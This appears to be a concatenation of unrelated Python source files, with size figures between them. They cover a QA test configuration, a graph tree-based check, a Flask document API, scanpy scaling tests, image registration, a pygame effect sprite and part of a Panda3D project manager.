    "k_reader_per_candidate": [20],
    "k_reader_total": [10],
    "reader_model_version": ["053b085d851196110d7a83d8e0f077d0a18470be"],
    "retriever_model_version": ["1a01b38498875d45f69b2a6721bf6fe87425da39"],
    "dpr_model_version": ["v1.0"],
    "retriever_type": ["bm25"], # Can be bm25, sbert, dpr, title or title_bm25
    "squad_dataset": [
        os.getenv("SRC_DIR") + "/piaf-ml/clients/dila/knowledge_base/squad.json"],
    "filter_level": [None],
    "preprocessing": [False],
    "boosting" : [1], #default to 1
    "split_by": ["word"], # Can be "word", "sentence", or "passage"
    "split_length": [1000],
}

# A dictionary specifying the criteria a test result must pass.  Keys are
# metric names; values are predicates on the corresponding metric which must
# return true if the value is satisfying.
pass_criteria_dila = {
    "reader_topk_accuracy_has_answer":
        # metric ~= 0.427 +/- 1%
        lambda metric: abs(metric / 0.427 - 1) < 0.01
}

# Each test: (parameter grid, tuning options, pass criteria).
tests = [
    (parameters_fquad, parameter_tuning_options, pass_criteria_fquad),
    (parameters_dila, parameter_tuning_options, pass_criteria_dila),
]
import networkx as nx
from misc import maximum_matching_all
from networkx import get_node_attributes
def is_tree_based(graph):
    """Decide whether *graph* is tree-based via Zhang's matching criterion.

    Returns True when every reticulation is matched (no unmatched
    reticulation left by a maximum matching of the Zhang bipartite graph),
    False otherwise, and None when the graph is not binary — Zhang's
    construction only applies to binary networks.
    """
    # Bug fix: the guard was inverted — it bailed out when the graph WAS
    # binary, although the (commented) message says the opposite intent.
    if not is_binary(graph):
        # print("Graph is not binary! Zhang's won't work!")
        return None
    unmatched_reticulation = zhang_graph(graph)
    # Tree-based iff no reticulation was left unmatched.
    return len(unmatched_reticulation) == 0
def is_binary(graph):
    """Return True when every node has in- and out-degree of at most two."""
    return all(
        graph.out_degree(v) <= 2 and graph.in_degree(v) <= 2
        for v in graph.nodes()
    )
# Use this for non-binary graph
def zhang_graph(graph):
    """Return the reticulations left unmatched by a maximum matching of the
    Zhang bipartite graph of *graph* (empty list => tree-based).

    Reticulations sit on side 0 of the bipartition and their tree-node
    parents on side 1 (see zhang_bipartite).
    """
    try:
        zhang = zhang_bipartite(graph)
        max_match = maximum_matching_all(zhang)
        # Bug fix: the node attribute was queried as 'biparite' (typo)
        # although zhang_bipartite stores it as 'bipartite', so every lookup
        # raised KeyError on a non-empty Zhang graph.
        reticulations = [n for n, d in zhang.nodes(data=True) if d['bipartite'] == 0]
        data = get_node_attributes(zhang, 'bipartite')
        matched_reticulations = set()
        for s, t in max_match.items():
            try:
                # Bug fix: collect the *reticulation* (side 0) endpoints of
                # matched edges; the original collected side-1 tree nodes,
                # which can never intersect `reticulations`, so the set
                # difference below always returned every reticulation.
                if data[s] == 0:
                    matched_reticulations.add(s)
                if data[t] == 0:
                    matched_reticulations.add(t)
            except KeyError:
                continue
    except nx.exception.NetworkXPointlessConcept:
        # Empty/degenerate graph: nothing to match, nothing unmatched.
        return list()
    set_minus = set(reticulations) - matched_reticulations
    return list(set_minus)
def zhang_bipartite(graph):
    """Build Zhang's bipartite graph: reticulation nodes (in-degree 2,
    out-degree 1) on side 0 and their tree-node parents (in-degree 1,
    out-degree 2) on side 1, joined when the parent feeds a reticulation."""
    def _is_reticulation(v):
        return graph.in_degree(v) == 2 and graph.out_degree(v) == 1

    def _is_tree_node(v):
        return graph.in_degree(v) == 1 and graph.out_degree(v) == 2

    zhang = nx.Graph()
    for node in graph.nodes():
        if not _is_reticulation(node):
            continue
        zhang.add_node(node, bipartite=0)
        # BE CAREFUL NOT TO ADD RETICULATIONS AGAIN ON OTHER SIDE!
        for parent in graph.predecessors(node):
            if not _is_tree_node(parent):
                continue
            zhang.add_node(parent, bipartite=1)
            for _, child in graph.edges(parent):
                # Add the edge only if we know the child is a reticulation.
                if _is_reticulation(child):
                    zhang.add_edge(node, parent)
    return zhang
| 2,101 | 675 |
# Public API of this package: re-export the signer and the base view.
__all__ = ["BaseIdCardAuthenticationView", "IdCardSigner"]

from .signer import IdCardSigner
from .views import BaseIdCardAuthenticationView
| 141 | 40 |
from arcade import Sprite


class PlaceableInterface:
    """Interface for objects that can be placed in the world.

    Subclasses override :meth:`place`; the default implementation is a no-op.
    """

    def place(self, *args):
        # Intentionally a no-op; concrete placeables override this.
        pass
| 101 | 36 |
"""RESTful API Document resource."""
from flask_restx import Resource, reqparse
from flask_restx._http import HTTPStatus
from werkzeug.datastructures import FileStorage
from ..service.document_service import (
delete_document,
edit_document,
get_all_documents,
get_document,
save_document,
)
from .dto import DocumentDTO
# Namespace and response model shared by the resources below.
api = DocumentDTO.document_api
_document = DocumentDTO.document

# Multipart form parser: an optional document name plus the uploaded file.
parser = reqparse.RequestParser()
parser.add_argument("document_name", type=str, help="Document name", location="form")
parser.add_argument("file", type=FileStorage, location="files")
@api.route("/")
class DocumentList(Resource):
    """Collection endpoint: list all documents and create new ones."""

    @api.doc("list of documents")
    @api.marshal_list_with(_document, envelope="data")
    def get(self):
        """List all documents."""
        return get_all_documents()

    @api.doc("Create a new Document")
    @api.expect(parser, validate=True)
    @api.response(HTTPStatus.CREATED, "Document successfully saved")
    @api.response(HTTPStatus.NOT_FOUND, "File not found")
    @api.response(HTTPStatus.BAD_REQUEST, "File empty")
    @api.response(HTTPStatus.NOT_ACCEPTABLE, "File extension not allowed")
    @api.response(HTTPStatus.REQUEST_ENTITY_TOO_LARGE, "File exceeds max upload size")
    def post(self):
        """Create a new Document from the multipart form data."""
        parse_data = parser.parse_args()
        document_name = parse_data["document_name"]
        file = parse_data["file"]
        # Both the uploaded file and a non-empty name are required.
        if not file or not document_name:
            self.api.abort(
                code=HTTPStatus.NOT_FOUND,
                message="File not found or document name empty",
            )
        else:
            return save_document(document_name, file)
@api.route("/<int:doc_id>")
@api.param("doc_id", "The ID of the docuemnt to process")
@api.response(HTTPStatus.NOT_FOUND, "Document not found")
@api.response(HTTPStatus.NOT_ACCEPTABLE, "File and document name empty")
class DocumentByID(Resource):
    """Item endpoint: retrieve, patch, or delete a single document."""

    @api.doc("Get a single document")
    @api.marshal_with(_document)
    def get(self, doc_id):
        """Retrieve a document."""
        document = get_document(doc_id)
        if not document:
            self.api.abort(code=HTTPStatus.NOT_FOUND, message="Document not found")
        else:
            return document

    @api.doc("Patch a document")
    @api.expect(parser)
    def patch(self, doc_id):
        """Patch a document's name and/or file contents."""
        document = get_document(doc_id)
        if not document:
            self.api.abort(code=HTTPStatus.NOT_FOUND, message="Document not found")
        else:
            parse_data = parser.parse_args()
            document_name = parse_data["document_name"]
            file = parse_data["file"]
            # A patch must change at least one of the two fields.
            if not file and not document_name:
                self.api.abort(HTTPStatus.NOT_ACCEPTABLE, message="Both inputs empty")
            else:
                return edit_document(document, document_name, file)
        # return self.get(doc_id)

    @api.doc("Delete a document")
    @api.response(HTTPStatus.BAD_REQUEST, "Can't delete document")
    def delete(self, doc_id):
        """Delete a document."""
        document = get_document(doc_id)
        if not document:
            self.api.abort(code=HTTPStatus.NOT_FOUND, message="Document not found")
        else:
            return delete_document(document)
# @api.route("/smes/<sme_id>")
# @api.param("sme_id", "The SME id")
# @api.response(HTTPStatus.NOT_FOUND, "SME not found")
# class DocumentSME(Resource):
# @api.doc("List all documents of an SME")
# @api.marshal_list_with(_document, envelope="data")
# def get(self, sme_id):
# """List all documents of an SME."""
# if not get_sme_by_id(sme_id):
# api.abort(404)
# return get_all_sme_documents(sme_id)
| 3,765 | 1,161 |
#!/usr/bin/env python
# encoding: utf-8
# Map raw survey question codes (Q1, Q2, ...) to readable column names.
col_shortener = {
    'Q1':'confirm',
    'Q2':'faculty',
    'Q3':'department',
    'Q4':'funders',
    'Q5':'position',
    'Q6':'use_software',
    'Q7':'importance_software',
    'Q8':'develop_own_code',
    'Q9':'development_expertise',
    'Q10':'sufficient_training',
    'Q11':'want_to_commercialise',
    'Q12':'ready_to_release',
    'Q13':'hpc_use',
    'Q14_1':'version_control',
    'Q14_2':'unit_regression_testing',
    'Q14_3':'continuous_integration',
    'Q14_4':'compilation',
    'Q14_5':'documentation',
    'Q15':'uni_support',
    'Q16':'hired_developer',
    'Q17':'costed_developer',
    'Q18_1':'hire_full_time_developer',
    'Q18_2':'hire_pool_developer',
    'Q19':'voucher',
    'Q20':'consulting',
    'Q21':'mailing'
}

# Columns to which an "other" category is added during preprocessing.
add_an_other_category = [
    'funders',
    'position',
    'hpc_use'
]

# Columns that are only sorted/tabulated, with no further analysis.
sort_no_further_analysis = [
    'faculty',
    'funders',
    'position',
    'hpc_use'
]

# Columns analysed as yes/no questions.
yes_no_analysis = [
    'use_software',
    'develop_own_code',
    'sufficient_training',
    'want_to_commercialise',
    'ready_to_release',
    'hired_developer'
]

# Columns analysed on a numeric rating scale.
scale_analysis = [
    'importance_software',
    'development_expertise',
    'sufficient_training'
]

# Columns analysed on a worded (Likert-style) scale.
worded_scale_analysis = [
    'version_control',
    'continuous_integration',
    'unit_regression_testing',
    'hire_full_time_developer',
    'hire_pool_developer'
]
| 1,405 | 563 |
import pytest
import numpy as np
from anndata import AnnData
from scipy.sparse import csr_matrix
import scanpy as sc
# test "data" for 3 cells * 4 genes
X = [
    [-1, 2, 0, 0],
    [1, 2, 4, 0],
    [0, 2, 2, 0],
]  # with gene std 1,0,2,0 and center 0,2,2,0
# Expected result without centering: divide each gene by its std
# (zero-std genes are left untouched).
X_scaled = [
    [-1, 2, 0, 0],
    [1, 2, 2, 0],
    [0, 2, 1, 0],
]  # with gene std 1,0,1,0 and center 0,2,1,0
# Expected result with centering: subtract the mean, then divide by std.
X_centered = [
    [-1, 0, -1, 0],
    [1, 0, 1, 0],
    [0, 0, 0, 0],
]  # with gene std 1,0,1,0 and center 0,0,0,0
@pytest.mark.parametrize('typ', [np.array, csr_matrix], ids=lambda x: x.__name__)
@pytest.mark.parametrize('dtype', ['float32', 'int64'])
def test_scale(typ, dtype):
    """sc.pp.scale: zero_center=True (the default) subtracts the mean and
    divides by std; zero_center=False only divides by std."""
    # (scale kwargs, expected matrix); the first case checks the default.
    cases = [
        (dict(), X_centered),
        (dict(zero_center=True), X_centered),
        (dict(zero_center=False), X_scaled),
    ]
    # AnnData arguments: scaling happens in place on adata.X.
    for kwargs, expected in cases:
        adata = AnnData(typ(X), dtype=dtype)
        sc.pp.scale(adata, **kwargs)
        assert np.allclose(csr_matrix(adata.X).toarray(), expected)
    # Bare count arguments; for simplicity only with explicit copy=True.
    for kwargs, expected in cases:
        scaled = sc.pp.scale(typ(X, dtype=dtype), copy=True, **kwargs)
        assert np.allclose(csr_matrix(scaled).toarray(), expected)
| 1,974 | 801 |
import cv2
import numpy as np
import bilinear
import patchreg
from skimage.util import view_as_windows
def bilinear_interpolation_of_patch_registration(master_srcdata, target_srcdata):
    """Register the master image onto the target via patch-wise homographies
    blended with bilinear interpolation.

    Pipeline: coarse global feature alignment, per-patch morph estimation on
    overlapping 1000x1000 windows, conversion of each morph to a dense
    displacement field, and bilinear quilting of the fields into one global
    remap applied to the master image.

    Args:
        master_srcdata: BGRA master (reference) image to be warped.
        target_srcdata: BGRA target image of the same size.

    Returns:
        The registered master image with the reflection padding removed.
    """
    print("Beginning bilinear_interpolation_of_patch_registration...")
    w_shape = (1000, 1000, 4)  # window size
    w_step = (500, 500, 4)  # window stride (50% overlap)
    padding = w_step[0]  # must do step padding
    master_data = cv2.copyMakeBorder(master_srcdata, padding, padding, padding, padding, cv2.BORDER_REFLECT)
    target_data = cv2.copyMakeBorder(target_srcdata, padding, padding, padding, padding, cv2.BORDER_REFLECT)
    master_img = cv2.cvtColor(master_data, code=cv2.COLOR_BGRA2RGBA)
    target_img = cv2.cvtColor(target_data, code=cv2.COLOR_BGRA2RGBA)
    # Stage One: Low-precision feature alignment
    h, _ = patchreg.alignFeatures(target_img, master_img)
    height, width = target_img.shape[:2]
    master_aligned = cv2.warpPerspective(master_img, h, (width, height))
    # Stage Two: Calculate patch-level registrations
    stack1 = np.concatenate((target_img, master_aligned), axis=-1)  # (2000, 40000, 8)
    patches = view_as_windows(stack1, window_shape=w_shape, step=w_step)
    morphs = patchreg.calcPlateMorphs(patches)  # (3,7,2,3,3)
    # Stage Three: Compute patch-level DVFs=dense displacement vector field
    id_patches = patchreg.calc_id_patches(img_shape=master_aligned.shape, patch_size=1000)  # (3,7,3,2000,2000,1)
    map_morphs = np.append(morphs, morphs[:, :, 1, None], axis=2)  # (3,7,3,3,3)
    reg_patches_src = patchreg.applyMorphs(id_patches, map_morphs)  # (3,7,3,2000,2000,1)
    map_patches = reg_patches_src[:, :, 1:, 500:1500, 500:1500, :]
    # Stage Four: Merge patch-level DVFs into a single global transform.
    quilts = bilinear.quilter(map_patches)
    wquilts = bilinear.bilinear_wquilts(map_patches)
    qmaps = [q * w for q, w in zip(quilts, wquilts)]  # element-wise weighting of each quilt
    qmaps_sum = qmaps[0] + qmaps[1] + qmaps[2] + qmaps[3]
    summed = (qmaps_sum).reshape(qmaps_sum.shape[:-1]).astype(np.float32)
    # `summed` holds the x/y coordinate maps consumed by cv2.remap.
    master_remap = cv2.remap(master_img, summed[0], summed[1], interpolation=cv2.INTER_LINEAR)
    master_reg = master_remap[padding:height-padding, padding:width-padding, :]
    return master_reg
def draw_img():
    """Overlay the 1000-px patch grid in green on a white-padded copy of the
    master image and write it to master_data.jpg (debug visualisation)."""
    src = cv2.imread("../data/OK1_1_32.jpg")
    pad = 500
    canvas = cv2.copyMakeBorder(src, pad, pad, pad, pad, cv2.BORDER_CONSTANT, value=(255, 255, 255))
    green = (0, 255, 0)
    for y in (1000, 2000):
        cv2.line(canvas, (0, y), (5000, y), green, 2)
    for x in (1000, 2000, 3000, 4000):
        cv2.line(canvas, (x, 0), (x, 3000), green, 2)
    cv2.imwrite("master_data.jpg", canvas)
def pad_imgs(master3, target3):
    """Reflect-pad two same-sized images to the next multiple of 1000 per
    dimension (never smaller than 2000), splitting the slack evenly.

    Returns (master_pad, target_pad, top_pad, down_pad, left_pad, right_pad).
    """
    master_h, master_w, _ = master3.shape
    target_h, target_w, _ = target3.shape
    assert master_h == target_h and master_w == target_w
    # Canvas size: each dimension rounded up to a multiple of 1000, min 2000.
    canvas_h = int(max(2000, np.ceil(master_h / 1000) * 1000))
    canvas_w = int(max(2000, np.ceil(master_w / 1000) * 1000))
    assert canvas_w >= master_w and canvas_h >= master_h
    # Split the slack evenly; any odd pixel goes to the right/bottom.
    left_pad = (canvas_w - master_w) // 2
    right_pad = canvas_w - master_w - left_pad
    top_pad = (canvas_h - master_h) // 2
    down_pad = canvas_h - master_h - top_pad
    master3_pad = cv2.copyMakeBorder(master3, top_pad, down_pad, left_pad, right_pad, cv2.BORDER_REFLECT)
    target3_pad = cv2.copyMakeBorder(target3, top_pad, down_pad, left_pad, right_pad, cv2.BORDER_REFLECT)
    return master3_pad, target3_pad, top_pad, down_pad, left_pad, right_pad
# ORB feature-matching tuning used by alignImages_Perspective below.
MAX_FEATURES = 5000
GOOD_MATCH_PERCENT = 0.45
def alignImages_Perspective(img1, img2):
    """Warp *img1* into *img2*'s frame via an ORB-feature homography.

    Matches ORB descriptors between the grayscale images, keeps the best
    GOOD_MATCH_PERCENT of matches, estimates a RANSAC homography, and
    returns the perspective-warped img1.
    """
    im1Gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
    im2Gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
    # Detect ORB features and compute descriptors.
    orb = cv2.ORB_create(MAX_FEATURES)
    keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)
    keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)
    # Match features.
    matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)
    matches = list(matcher.match(descriptors1, descriptors2, None))
    # Sort matches by score
    matches.sort(key=lambda x: x.distance, reverse=False)
    # Remove not so good matches
    numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)
    matches = matches[:numGoodMatches]
    # Extract location of good matches
    points1 = np.zeros((len(matches), 2), dtype=np.float32)
    points2 = np.zeros((len(matches), 2), dtype=np.float32)
    for i, match in enumerate(matches):
        points1[i, :] = keypoints1[match.queryIdx].pt
        points2[i, :] = keypoints2[match.trainIdx].pt
    height, width, channels = img2.shape
    # Perspective: RANSAC homography, then warp img1 into img2's frame.
    h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)
    im1Reg_Perspective = cv2.warpPerspective(img1, h, (width, height))  # perspective transform
    return im1Reg_Perspective
def process_single_imgpart(img_master, target_img):
    """Align *img_master* onto *target_img* and mark small difference blobs
    (suspected defects) with red contours on a copy of the target.

    The target is white-padded vertically to the master's height when it is
    shorter; that padding is cropped off the returned image.
    """
    master_height, master_width, _ = img_master.shape
    cur_height, cur_width, _ = target_img.shape
    assert cur_width == master_width
    top_pad, down_pad = 0, 0
    target_imgpad = target_img.copy()
    if master_height > cur_height:
        # Pad the shorter target symmetrically with white to match heights.
        top_pad = int((master_height - cur_height)/2)
        down_pad = master_height - cur_height - top_pad
        target_imgpad = cv2.copyMakeBorder(target_img, top_pad, down_pad, 0, 0, cv2.BORDER_CONSTANT, value=(255, 255, 255))
    elif master_height < cur_height:
        # NOTE(review): a taller target is only reported, not handled — the
        # absdiff below then operates on mismatched heights.  Confirm.
        print("cur_height > master_height", cur_height, master_height)
    img_show = target_imgpad.copy()
    im2Gray = cv2.cvtColor(target_imgpad, cv2.COLOR_BGR2GRAY)
    im1Reg_Perspective = alignImages_Perspective(img_master, target_imgpad)
    imRegGray = cv2.cvtColor(im1Reg_Perspective, cv2.COLOR_BGR2GRAY)
    # Differences between the aligned master and the target.
    diff = cv2.absdiff(imRegGray, im2Gray)
    # cv2.imwrite("diff.jpg", diff)
    ret, thresh = cv2.threshold(diff, 120, 255, cv2.THRESH_BINARY)  # 120
    # cv2.imwrite("thresh.jpg", thresh)
    contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        # Keep only small blobs; larger regions are treated as alignment
        # artifacts rather than defects.
        if area > 1 and area < max(cur_height, cur_width):
            cv2.drawContours(img_show, cnt, -1, (0, 0, 255), 2)
    img_out = img_show[top_pad: master_height - down_pad, :, : ]
    return img_out
if __name__ == "__main__":
    # draw_img()
    # exit()
    root = "../data/"
    master_srcdata = cv2.imread(root + "OK1_1.jpg")
    target_srcdata = cv2.imread(root + "NG1_1.jpg")
    # Crop both images to same-sized regions of interest.
    master3 = master_srcdata[300:4850,:,:]
    # cv2.imwrite("master3.jpg", master3)
    target3 = target_srcdata[720:5270,:,:]
    # cv2.imwrite("target3.jpg", target3)
    # padding to 1000s, at least 2000
    master3_pad, target3_pad, top_pad, down_pad, left_pad, right_pad = pad_imgs(master3, target3)
    # cv2.imwrite("master3_pad.jpg", master3_pad)
    # cv2.imwrite("target3_pad.jpg", target3_pad)
    masterpad_h, masterpad_w, _ = master3_pad.shape
    # Patch-wise registration on the padded images, then crop the padding off.
    master_reg_pad = bilinear_interpolation_of_patch_registration(master3_pad, target3_pad)
    master3_reg = master_reg_pad[top_pad: masterpad_h-down_pad, left_pad:masterpad_w-right_pad, : ]
    cv2.imwrite("master3_reg.jpg", master3_reg)
    cv2.imwrite("master3.jpg", master3)
    cv2.imwrite("target3.jpg", target3)
    # Stage Five: high-precision feature alignment
    master_reg_out = process_single_imgpart(master3_reg, target3)
    cv2.imwrite("master_reg_out.jpg", master_reg_out)
    master_out = process_single_imgpart(master3, target3)
    cv2.imwrite("master_out.jpg", master_out)
# Copyright (c) 2020
# [This program is licensed under the "MIT License"]
# Please see the file LICENSE in the source
# distribution of this software for license terms.
import pygame as pg
import ruamel.yaml
from random import choice
vec = pg.math.Vector2


class Weapon_VFX(pg.sprite.Sprite):
    """
    Weapon_VFX appear when the player is shooting.
    Picking a random image from the supplied pool each time provides a
    cheap animation effect; the sprite removes itself after its configured
    lifetime has elapsed.
    """

    def __init__(
        self,
        settings: ruamel.yaml.comments.CommentedMap,
        game_client_data_weaponvfx: list,
        pos: vec,
    ):
        self.settings = settings
        # Draw on the VFX layer configured in the settings.
        self._layer = self.settings["layer"]["vfx"]
        pg.sprite.Sprite.__init__(self)
        tile = self.settings["gen"]["tilesize"]
        frame = choice(game_client_data_weaponvfx)
        self.image = pg.transform.scale(frame, (tile, tile))
        self.rect = self.image.get_rect()
        self.pos = self.rect.center = pos
        # Timestamp used by update() to expire the effect.
        self.spawn_time = pg.time.get_ticks()

    def update(self):
        # Kill the sprite once its configured lifetime has passed.
        lifetime = self.settings["weapon"]["vbullet"]["fx_life"]
        if pg.time.get_ticks() - self.spawn_time > lifetime:
            self.kill()
| 1,253 | 390 |
import fnmatch
import os
import shutil
import subprocess
import sys
import time
from collections import OrderedDict
try:
import configparser
except ImportError:
import ConfigParser as configparser
class PManException(Exception):
    """Base class for all errors raised by pman."""
    pass


class NoConfigError(PManException):
    """Raised when no .pman config file is found up the directory tree."""
    pass


class CouldNotFindPythonError(PManException):
    """Raised when no Python interpreter that can import panda3d is found."""
    pass


class BuildError(PManException):
    """Raised when a build fails."""
    pass


class FrozenEnvironmentError(PManException):
    """Raised for operations that are unsupported in frozen applications."""
    def __init__(self):
        PManException.__init__(self, "Operation not supported in frozen applications")
# Detect whether we are running frozen (packaged executable): frozen apps do
# not define __file__ at module scope, so provide a placeholder there.
if '__file__' not in globals():
    __is_frozen = True
    __file__ = ''
else:
    __is_frozen = False
# Defaults merged into every project's .pman config file.
_config_defaults = OrderedDict([
    ('general', OrderedDict([
        ('name', 'Game'),
        ('render_plugin', ''),
    ])),
    ('build', OrderedDict([
        ('asset_dir', 'assets/'),
        ('export_dir', 'game/assets/'),
        ('ignore_patterns', '*.blend1, *.blend2'),
    ])),
    ('run', OrderedDict([
        ('main_file', 'game/main.py'),
        ('auto_build', True),
        ('auto_save', True),
    ])),
])

# Defaults for the per-user .pman.user file.
_user_config_defaults = OrderedDict([
    ('blender', OrderedDict([
        ('last_path', 'blender'),
        ('use_last_path', True),
    ])),
])
def __py2_read_dict(config, d):
    """Python 2 shim for ConfigParser.read_dict: load *d* (a mapping of
    section name -> {option: value}) into *config*."""
    for section_name, section in d.items():
        config.add_section(section_name)
        for option_name, option_value in section.items():
            config.set(section_name, option_name, option_value)
def _get_config(startdir, conf_name, defaults):
    """Search from *startdir* upward for *conf_name* and parse it.

    The parser is pre-loaded with *defaults*, then overlaid with the file's
    contents, and gains a synthetic 'internal' section recording the project
    directory (stripped again on write).  Raises NoConfigError when no
    config file is found anywhere up the tree.
    """
    try:
        if startdir is None:
            startdir = os.getcwd()
    # NOTE(review): FileNotFoundError does not exist on Python 2, which the
    # rest of this module otherwise supports -- confirm whether py2 matters.
    except FileNotFoundError:
        # The project folder was deleted on us
        raise NoConfigError("Could not find config file")
    # Walk up the directory tree one component at a time.
    dirs = os.path.abspath(startdir).split(os.sep)
    while dirs:
        cdir = os.sep.join(dirs)
        # An empty cdir means we have reached the filesystem root.
        if cdir.strip() and conf_name in os.listdir(cdir):
            configpath = os.path.join(cdir, conf_name)
            config = configparser.ConfigParser()
            # Python 2's ConfigParser has no read_dict(); use the shim.
            if hasattr(config, 'read_dict'):
                config.read_dict(defaults)
            else:
                __py2_read_dict(config, defaults)
            config.read(configpath)
            # Stash the project location for the path helpers below.
            config.add_section('internal')
            config.set('internal', 'projectdir', os.path.dirname(configpath))
            return config
        dirs.pop()
    # No config found
    raise NoConfigError("Could not find config file")
def get_config(startdir=None):
    """Find and load the project config (`.pman`), searching upward from *startdir* (cwd when None)."""
    return _get_config(startdir, '.pman', _config_defaults)
def get_user_config(startdir=None):
    """Find and load the per-user config (`.pman.user`), creating it if absent.

    The user config lives beside the project `.pman` file and holds
    machine-local settings (e.g. the Blender path).
    """
    try:
        return _get_config(startdir, '.pman.user', _user_config_defaults)
    except NoConfigError:
        pass
    # No user config yet: touch an empty one next to the project config and
    # re-run the normal lookup so defaults are applied consistently.
    project_config = get_config(startdir)
    fp = os.path.join(project_config.get('internal', 'projectdir'), '.pman.user')
    print("Creating user config at {}".format(fp))
    open(fp, 'w').close()
    return _get_config(startdir, '.pman.user', _user_config_defaults)
def _write_config(config, conf_name):
    """Persist *config* to *conf_name* inside the project directory.

    The synthetic 'internal' section added by _get_config() is stripped
    before writing so it never leaks into the on-disk file.
    """
    writecfg = configparser.ConfigParser()
    # Bug fix: Python 2's ConfigParser has no read_dict(), yet this module
    # otherwise supports py2 (see the configparser import fallback).  Copy
    # sections manually on that path instead of crashing.
    if hasattr(writecfg, 'read_dict'):
        writecfg.read_dict(config)
    else:
        for section in config.sections():
            writecfg.add_section(section)
            for option, value in config.items(section):
                writecfg.set(section, option, value)
    writecfg.remove_section('internal')
    with open(os.path.join(config.get('internal', 'projectdir'), conf_name), 'w') as f:
        writecfg.write(f)
def write_config(config):
    """Write the project config back to its `.pman` file."""
    _write_config(config, '.pman')


def write_user_config(user_config):
    """Write the per-user config back to its `.pman.user` file."""
    _write_config(user_config, '.pman.user')
def is_frozen():
    """Return True when running inside a frozen (built) application."""
    return __is_frozen
def get_python_program(config):
    """Find a Python interpreter on PATH that can import panda3d.

    *config* is currently unused but kept for API symmetry with the other
    helpers.  Raises CouldNotFindPythonError when no candidate works.
    """
    python_programs = [
        'ppython',
        'python3',
        'python',
        'python2',
    ]
    # Check to see if there is a version of Python that can import panda3d
    for pyprog in python_programs:
        args = [
            pyprog,
            '-c',
            'import panda3d.core; import direct',
        ]
        with open(os.devnull, 'w') as fp:
            try:
                retcode = subprocess.call(args, stderr=fp)
            except OSError:
                # Bug fix: FileNotFoundError does not exist on Python 2
                # (supported elsewhere in this module) and is an OSError
                # subclass on Python 3, so OSError covers both -- treat a
                # missing/unlaunchable interpreter as "not usable".
                retcode = 1
        if retcode == 0:
            return pyprog
    # We couldn't find a python program to run
    raise CouldNotFindPythonError('Could not find a usable Python install')
def create_project(projectdir):
    """Create (or update) a pman project skeleton in *projectdir*.

    Ensures a `.pman` config exists, creates the assets/ and game/
    directories, drops in a starter main.py, and (re)installs the
    blenderpanda support module.  Raises FrozenEnvironmentError when
    called from a frozen build.
    """
    if is_frozen():
        raise FrozenEnvironmentError()
    confpath = os.path.join(projectdir, '.pman')
    if os.path.exists(confpath):
        print("Updating project in {}".format(projectdir))
    else:
        print("Creating new project in {}".format(projectdir))
        # Touch config file to make sure it is present
        with open(confpath, 'a') as f:
            pass
    # Re-read and re-write the config so any new defaults get persisted.
    config = get_config(projectdir)
    write_config(config)
    templatedir = os.path.join(os.path.dirname(__file__), 'templates')
    print("Creating directories...")
    dirs = [
        'assets',
        'game',
    ]
    # NOTE(review): this list mixes absolute template paths and bare file
    # names; os.path.join() below returns an absolute second argument
    # unchanged, so both forms resolve -- confirm this is intentional.
    bpanda_mod_files = [
        os.path.join(templatedir, '__init__.py'),
        os.path.join(templatedir, 'bpbase.py'),
        'rendermanager.py',
        'pman.py',
        'pman_build.py',
    ]
    dirs = [os.path.join(projectdir, i) for i in dirs]
    for d in dirs:
        if os.path.exists(d):
            print("\tSkipping existing directory: {}".format(d))
        else:
            print("\tCreating directory: {}".format(d))
            os.mkdir(d)
    print("Creating main.py")
    with open(os.path.join(templatedir, 'main.py')) as f:
        main_data = f.read()
    mainpath = os.path.join(projectdir, 'game', 'main.py')
    if os.path.exists(mainpath):
        # Never clobber the user's existing entry point.
        print("\tmain.py already exists at {}".format(mainpath))
    else:
        with open(mainpath, 'w') as f:
            f.write(main_data)
        print("\tmain.py created at {}".format(mainpath))
    # The blenderpanda module is always replaced so it stays up to date.
    bpmodpath = os.path.join(projectdir, 'game/blenderpanda')
    if os.path.exists(bpmodpath):
        print("Updating blenderpanda module")
        shutil.rmtree(bpmodpath)
    else:
        print("Creating blenderpanda module")
    os.mkdir(bpmodpath)
    for cf in bpanda_mod_files:
        bname = os.path.basename(cf)
        print("\tCopying over {}".format(bname))
        cfsrc = os.path.join(os.path.dirname(__file__), cf)
        cfdst = os.path.join(projectdir, 'game', 'blenderpanda', bname)
        shutil.copy(cfsrc, cfdst)
        print("\t\t{} created at {}".format(bname, cfdst))
def get_abs_path(config, path):
    """Resolve *path* relative to the project directory stored in *config*."""
    projectdir = config.get('internal', 'projectdir')
    return os.path.join(projectdir, path)
def get_rel_path(config, path):
    """Return *path* expressed relative to the project directory."""
    return os.path.relpath(path, start=config.get('internal', 'projectdir'))
def build(config=None):
    """Export assets from asset_dir to export_dir, converting .blend to .bam.

    Non-blend files are copied verbatim; blend files are batched into a
    single headless Blender invocation.  Outputs newer than their source
    (by mtime) are skipped.  Raises BuildError when the asset directory is
    missing and FrozenEnvironmentError inside frozen builds.
    """
    if is_frozen():
        raise FrozenEnvironmentError()
    if config is None:
        config = get_config()
    user_config = get_user_config(config.get('internal', 'projectdir'))
    # time.perf_counter() is Python 3 only; fall back for Python 2.
    if hasattr(time, 'perf_counter'):
        stime = time.perf_counter()
    else:
        stime = time.time()
    print("Starting build")
    srcdir = get_abs_path(config, config.get('build', 'asset_dir'))
    dstdir = get_abs_path(config, config.get('build', 'export_dir'))
    if not os.path.exists(srcdir):
        raise BuildError("Could not find asset directory: {}".format(srcdir))
    if not os.path.exists(dstdir):
        print("Creating asset export directory at {}".format(dstdir))
        os.makedirs(dstdir)
    print("Read assets from: {}".format(srcdir))
    print("Export them to: {}".format(dstdir))
    ignore_patterns = [i.strip() for i in config.get('build', 'ignore_patterns').split(',')]
    print("Ignoring file patterns: {}".format(ignore_patterns))
    num_blends = 0
    for root, dirs, files in os.walk(srcdir):
        for asset in files:
            src = os.path.join(root, asset)
            # NOTE(review): str.replace swaps the FIRST occurrence anywhere
            # in the path, not just the prefix -- fragile if the srcdir
            # string reappears deeper in the path.  Consider os.path.relpath.
